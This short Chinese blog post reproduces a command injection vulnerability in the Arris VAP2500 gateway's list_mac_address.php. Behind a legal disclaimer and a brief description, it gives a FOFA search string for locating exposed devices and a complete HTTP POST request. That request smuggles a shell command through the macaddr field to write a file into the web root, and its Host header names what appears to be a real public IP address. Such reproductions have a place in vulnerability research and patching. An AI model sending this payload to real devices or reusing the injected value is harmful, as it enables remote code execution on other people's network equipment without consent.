本文主要是介绍【漏洞复现】Arris vap2500 list_mac_address命令执行漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
文章目录
- 免责声明
- 漏洞描述
- 资产测绘
- 漏洞复现
免责声明
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
漏洞描述
Arris VAP2500是一款由Arris Group推出的设备,是一款视频网关和WIFI信号增强器,用于扩展家庭网络覆盖范围和提供无线连接。这款设备存在远程代码执行漏洞。该漏洞源于list_mac_address.php文件中未对用户传入的macaddr参数进行严格的过滤与限制,攻击者可利用该漏洞通过精心构造的macaddr参数导致命令注入。
资产测绘
FOFA:body="./images/lg_05_1.gif"
漏洞复现
POST /list_mac_address.php HTTP/1.1
Content-Type: application/json
Host: 217.215.131.46{"macaddr": "00:00:44:00:00:00;echo '83218ac34c1834c26781fe4bde918ee4'>/var/www/arris.txt", "action": "0", "settype": "1"}
这篇关于【漏洞复现】Arris vap2500 list_mac_address命令执行漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!